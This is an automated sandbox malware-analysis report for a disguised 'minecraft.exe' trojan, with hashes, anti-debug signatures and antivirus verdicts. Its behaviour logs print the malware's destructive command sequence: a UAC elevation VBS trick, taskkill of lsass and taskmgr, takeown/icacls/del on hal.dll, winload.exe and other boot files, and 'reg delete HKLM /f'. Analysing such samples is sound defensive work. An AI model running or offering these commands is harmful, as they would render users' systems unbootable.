Summary | ZeroBOX

minecraft.exe

Gen1 Generic Malware UPX Antivirus Malicious Library Malicious Packer ftp AntiDebug PE64 OS Processor Check PE32 PE File AntiVM DLL
Category Machine Started Completed
FILE s1_win7_x6403_us Oct. 31, 2024, 5:50 p.m. Oct. 31, 2024, 5:52 p.m.
Size 55.5KB
Type PE32+ executable (GUI) x86-64, for MS Windows
MD5 09718d571b01cb93e6f983be7b99a4b2
SHA256 6eb25168bde4a9e7f3a273229ca0fbf4f17133788b5c68bf3151eb48826e1169
CRC32 BAD55F4A
ssdeep 1536:34dJooh0Wa0aer344Jw/ytUqVS5EkIijQ1fTNiPJ:34dzVTaer344JzthRZijQ1Ji
Yara
  • PE_Header_Zero - PE File Signature
  • IsPE64 - (no description)
  • UPX_Zero - UPX packed file

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
No hosts contacted.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp\C0DA.tmp>
console_handle: 0x0000000000000007
1 1 0

WriteConsoleW

buffer: set
console_handle: 0x0000000000000007
1 1 0

WriteConsoleW

buffer: "params=C:\Users\test22\AppData\Local\Temp\minecraft.exe"
console_handle: 0x0000000000000007
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp\C0DA.tmp>
console_handle: 0x0000000000000007
1 1 0

WriteConsoleW

buffer: cd
console_handle: 0x0000000000000007
1 1 0

WriteConsoleW

buffer: /d "C:\Users\test22\AppData\Local\Temp\"
console_handle: 0x0000000000000007
1 1 0

WriteConsoleW

buffer: if
console_handle: 0x0000000000000007
1 1 0

WriteConsoleW

buffer: exist "C:\Users\test22\AppData\Local\Temp\getadmin.vbs"
console_handle: 0x0000000000000007
1 1 0

WriteConsoleW

buffer: del
console_handle: 0x0000000000000007
1 1 0

WriteConsoleW

buffer: "C:\Users\test22\AppData\Local\Temp\getadmin.vbs"
console_handle: 0x0000000000000007
1 1 0

WriteConsoleW

buffer: fsutil
console_handle: 0x0000000000000007
1 1 0

WriteConsoleW

buffer: dirty query C:
console_handle: 0x0000000000000007
1 1 0

WriteConsoleW

buffer: nul
console_handle: 0x0000000000000007
1 1 0

WriteConsoleW

buffer: nul
console_handle: 0x0000000000000007
1 1 0

WriteConsoleW

buffer: echo
console_handle: 0x0000000000000007
1 1 0

WriteConsoleW

buffer: Set UAC = CreateObject("Shell.Application") : UAC.ShellExecute "cmd.exe", "/k cd ""C:\Users\test22\AppData\Local\Temp\"" && ""C:\Users\test22\AppData\Local\Temp\MINECR~1.EXE"" C:\Users\test22\AppData\Local\Temp\minecraft.exe", "", "runas", 1
console_handle: 0x0000000000000007
1 1 0

WriteConsoleW

buffer: "C:\Users\test22\AppData\Local\Temp\getadmin.vbs"
console_handle: 0x0000000000000007
1 1 0

WriteConsoleW

buffer: "C:\Users\test22\AppData\Local\Temp\getadmin.vbs"
console_handle: 0x0000000000000007
1 1 0

WriteConsoleW

buffer: exit
console_handle: 0x0000000000000007
1 1 0

WriteConsoleW

buffer: /B
console_handle: 0x0000000000000007
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x000000000000000b
1 1 0

WriteConsoleW

buffer: cd
console_handle: 0x000000000000000b
1 1 0

WriteConsoleW

buffer: C:\Windows\System32
console_handle: 0x000000000000000b
1 1 0

WriteConsoleW

buffer: C:\Windows\System32>
console_handle: 0x000000000000000b
1 1 0

WriteConsoleW

buffer: taskkill
console_handle: 0x000000000000000b
1 1 0

WriteConsoleW

buffer: /f /im taskmgr.exe
console_handle: 0x000000000000000b
1 1 0

WriteConsoleW

buffer: C:\Windows\System32>
console_handle: 0x000000000000000b
1 1 0

WriteConsoleW

buffer: taskkill
console_handle: 0x000000000000000b
1 1 0

WriteConsoleW

buffer: /f /im regedit.exe
console_handle: 0x000000000000000b
1 1 0

WriteConsoleW

buffer: C:\Windows\System32>
console_handle: 0x000000000000000b
1 1 0

WriteConsoleW

buffer: takeown
console_handle: 0x000000000000000b
1 1 0

WriteConsoleW

buffer: /f C:\Windows\System32\hal.dll /r /d y
console_handle: 0x000000000000000b
1 1 0

WriteConsoleW

buffer: C:\Windows\System32>
console_handle: 0x000000000000000b
1 1 0

WriteConsoleW

buffer: icacls
console_handle: 0x000000000000000b
1 1 0

WriteConsoleW

buffer: C:\Windows\System32\hal.dll /grant everyone:F /t
console_handle: 0x000000000000000b
1 1 0

WriteConsoleW

buffer: C:\Windows\System32>
console_handle: 0x000000000000000b
1 1 0

WriteConsoleW

buffer: del
console_handle: 0x000000000000000b
1 1 0

WriteConsoleW

buffer: /f /s /q C:\Windows\System32\hal.dll
console_handle: 0x000000000000000b
1 1 0

WriteConsoleW

buffer: C:\Windows\System32\hal.dll
console_handle: 0x000000000000000b
1 1 0

WriteConsoleW

buffer: Access is denied.
console_handle: 0x000000000000000f
1 1 0

WriteConsoleW

buffer: C:\Windows\System32>
console_handle: 0x000000000000000b
1 1 0

WriteConsoleW

buffer: takeown
console_handle: 0x000000000000000b
1 1 0

WriteConsoleW

buffer: /f C:\Windows\System32\winload.exe /r /d y
console_handle: 0x000000000000000b
1 1 0

WriteConsoleW

buffer: C:\Windows\System32>
console_handle: 0x000000000000000b
1 1 0

WriteConsoleW

buffer: icacls
console_handle: 0x000000000000000b
1 1 0

WriteConsoleW

buffer: C:\Windows\System32\winload.exe /grant everyone:F /t
console_handle: 0x000000000000000b
1 1 0

WriteConsoleW

buffer: C:\Windows\System32>
console_handle: 0x000000000000000b
1 1 0

WriteConsoleW

buffer: del
console_handle: 0x000000000000000b
1 1 0

WriteConsoleW

buffer: /f /s /q C:\Windows\System32\winload.exe
console_handle: 0x000000000000000b
1 1 0

WriteConsoleW

buffer: C:\Windows\System32\winload.exe
console_handle: 0x000000000000000b
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
file C:\Users\test22\AppData\Local\Temp\C0DA.tmp\C0DB.tmp\C0EB.bat
cmdline "C:\Windows\system32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\C0DA.tmp\C0DB.tmp\C0EB.bat C:\Users\test22\AppData\Local\Temp\minecraft.exe"
wmi SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "regedit.exe")
wmi SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "lsass.exe")
wmi SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "taskmgr.exe")
section {u'size_of_data': u'0x0000d400', u'virtual_address': u'0x00018000', u'entropy': 7.984045486047316, u'name': u'UPX1', u'virtual_size': u'0x0000e000'} entropy 7.98404548605 description A section with a high entropy has been found
entropy 0.963636363636 description Overall entropy of this PE file is high
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeTakeOwnershipPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule DebuggerException__SetConsoleCtrl
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
Time & API Arguments Status Return Repeated

NtTerminateProcess

status_code: 0x00000001
process_identifier: 452
process_handle: 0x0000000000000178
0 0

NtTerminateProcess

status_code: 0x00000001
process_identifier: 452
process_handle: 0x0000000000000178
1 0 0
section UPX0 description Section name indicates UPX
section UPX1 description Section name indicates UPX
cmdline taskkill /f /im regedit.exe
cmdline taskkill /f /im lsass.exe
cmdline icacls C:\Windows\System32\shutdown.exe /grant everyone:F /t
cmdline fsutil dirty query C:
cmdline taskkill /f /im taskmgr.exe
cmdline takeown /f C:\Windows\System32\shutdown.exe /r /d y
cmdline reg delete HKLM /f
cmdline "C:\Windows\system32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\C0DA.tmp\C0DB.tmp\C0EB.bat C:\Users\test22\AppData\Local\Temp\minecraft.exe"
file C:\Windows\System32\taskmgr.exe
file C:\Windows\System32\drivers\ko-KR\vwifibus.sys.mui
file C:\Windows\System32\drivers\amdk8.sys
file C:\Windows\System32\drivers\asyncmac.sys
file C:\Windows\System32\drivers\ko-KR\intelppm.sys.mui
file C:\Windows\System32\drivers\en-US\pcmcia.sys.mui
file C:\Windows\System32\drivers\en-US\partmgr.sys.mui
file C:\Windows\System32\drivers\filetrace.sys
file C:\Windows\System32\drivers\ndisuio.sys
file C:\Windows\System32\drivers\WUDFRd.sys
file C:\Windows\System32\drivers\monitor.sys
file C:\Windows\System32\drivers\WUDFPf.sys
file C:\Windows\System32\drivers\ko-KR\http.sys.mui
file C:\Windows\System32\drivers\ko-KR\mountmgr.sys.mui
file C:\Windows\System32\drivers\portcls.sys
file C:\Windows\System32\drivers\wfplwf.sys
file C:\Windows\System32\drivers\blbdrive.sys
file C:\Windows\System32\drivers\ko-KR\fvevol.sys.mui
file C:\Windows\System32\drivers\netbios.sys
file C:\Windows\System32\drivers\mstee.sys
file C:\Windows\System32\drivers\npfs.sys
file C:\Windows\System32\drivers\hidir.sys
file C:\Windows\System32\drivers\ko-KR\usbhub.sys.mui
file C:\Windows\System32\drivers\en-US\mssmbios.sys.mui
file C:\Windows\System32\drivers\RNDISMP.sys
file C:\Windows\System32\drivers\en-US\serial.sys.mui
file C:\Windows\System32\drivers\rasl2tp.sys
file C:\Windows\System32\drivers\srvnet.sys
file C:\Windows\System32\drivers\en-US\bthenum.sys.mui
file C:\Windows\System32\drivers\ko-KR\bthenum.sys.mui
file C:\Windows\System32\drivers\ks.sys
file C:\Windows\System32\drivers\ko-KR\cdrom.sys.mui
file C:\Windows\System32\drivers\ipnat.sys
file C:\Windows\System32\drivers\en-US\BTHUSB.SYS.mui
file C:\Windows\System32\drivers\en-US\serscan.sys.mui
file C:\Windows\System32\drivers\etc\networks
file C:\Windows\System32\drivers\flpydisk.sys
file C:\Windows\System32\drivers\lsi_sas2.sys
file C:\Windows\System32\drivers\mrxdav.sys
file C:\Windows\System32\drivers\ko-KR\wacompen.sys.mui
file C:\Windows\System32\drivers\FWPKCLNT.SYS
file C:\Windows\System32\drivers\en-US\1394ohci.sys.mui
file C:\Windows\System32\drivers\rdyboost.sys
file C:\Windows\System32\drivers\wacompen.sys
file C:\Windows\System32\drivers\circlass.sys
file C:\Windows\System32\drivers\netio.sys
file C:\Windows\System32\drivers\ko-KR\ndisuio.sys.mui
file C:\Windows\System32\drivers\ko-KR\BrSerId.sys.mui
file C:\Windows\System32\drivers\CompositeBus.sys
file C:\Windows\System32\drivers\fdc.sys
file C:\Windows\System32\drivers\ko-KR\Dot4usb.sys.mui
Process injection Process 1700 resumed a thread in remote process 2120
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x00000000000001f8
suspend_count: 1
process_identifier: 2120
1 0 0
cmdline icacls C:\Windows\System32\wininit.exe /grant everyone:F /t
cmdline icacls C:\Windows\System32\regedit.exe /grant everyone:F /t
cmdline icacls C:\Windows\System32\winresume.exe /grant everyone:F /t
cmdline icacls C:\Windows\System32\ntoskrnl.exe /grant everyone:F /t
cmdline icacls C:\Windows\System32\shutdown.exe /grant everyone:F /t
cmdline icacls C:\Windows\System32\drivers /grant everyone:F /t
cmdline icacls C:\Windows\System32\taskmgr.exe /grant everyone:F /t
cmdline icacls C:\Windows\System32\winlogon.exe /grant everyone:F /t
cmdline icacls C:\Windows\System32\winload.exe /grant everyone:F /t
cmdline icacls C:\Windows\System32\hal.dll /grant everyone:F /t
cmdline icacls C:\Windows\System32\consent.exe /grant everyone:F /t
Bkav W64.AIDetectMalware
Lionic Trojan.Win32.Generic.4!c
tehtris Generic.Malware
Cynet Malicious (score: 100)
Skyhigh BehavesLike.Win64.Generic.qc
ALYac Trojan.GenericKD.74521350
Cylance Unsafe
CrowdStrike win/malicious_confidence_70% (D)
BitDefender Trojan.GenericKD.74520337
Arcabit Trojan.Generic.D4711711
VirIT Trojan.Win64.Agent.CHMP
Symantec ML.Attribute.HighConfidence
Elastic malicious (moderate confidence)
APEX Malicious
Avast Win64:Evo-gen [Trj]
MicroWorld-eScan Trojan.GenericKD.74520337
Emsisoft Trojan.GenericKD.74520337 (B)
DrWeb Trojan.KillProc2.23824
McAfeeD Real Protect-LS!09718D571B01
CTX exe.trojan.generic
Sophos Mal/Generic-S
Ikarus Trojan.PowerShell.Crypt
FireEye Generic.mg.09718d571b01cb93
Jiangmin Trojan.Alien.ga
Google Detected
Antiy-AVL Trojan/Win32.Phonzy
Kingsoft malware.kb.b.986
Gridinsoft Trojan.Win64.Agent.sa
Xcitium Malware@#36w60dwm4dpfh
Microsoft Trojan:Win32/Bankinc
GData Trojan.GenericKD.74520337
Varist W64/Agent.CAU.gen!Eldorado
AhnLab-V3 Malware/Win.Generic.R426832
McAfee Artemis!09718D571B01
DeepInstinct MALICIOUS
Malwarebytes Generic.Malware.AI.DDS
Panda Trj/Chgt.AD
MaxSecure Trojan.Malware.300983.susgen
Fortinet W64/Agent.4987!tr
AVG Win64:Evo-gen [Trj]
Paloalto generic.ml
alibabacloud Trojan:Win/Bankinc.Gen